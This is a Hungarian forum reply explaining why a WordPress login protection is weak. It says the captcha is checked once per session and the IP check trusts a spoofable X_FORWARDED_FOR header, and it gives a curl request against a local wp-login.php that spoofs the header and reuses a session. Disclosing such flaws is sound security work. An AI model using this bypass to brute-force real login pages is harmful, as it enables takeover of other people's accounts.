Pityu eredeti hozzászólása
Ne már, évek óta ezt használom :S
A captchat mindosszesen egyszer validalja egy session alatt, ugyhogy azt annyi megkerulni egy bruteforce script-el, hogy egyszer beirom es onnantol a kapott session_id-t hasznalom.
Az IP cimet az X_FORWARDED_FOR http fejlect alapjan ellenorzi, es azt arra allitod amire akarod:
Kód:
curl -i -s -k -X 'POST' \
-H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0' -H 'Referer: http://localhost:9000/wp-login.php?redirect_to=http%3A%2F%2Flocalhost%3A9000%2Fwp-admin&reauth=1' -H 'Upgrade-Insecure-Requests: 1' -H 'Content-Type: application/x-www-form-urlencoded' \
-H "X_FORWARDED_FOR: 1.1.1.1" \
-b 'wordpress_test_cookie=WP+Cookie+check; PHPSESSID=c0cotcgsm8ja7pg24i16vba4b6' \
--data-binary $'log=foo&pwd=bar&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%3A9000%2Fwp-admin&testcookie=1' \
'http://localhost:9000/wp-login.php'
Könyvjelzők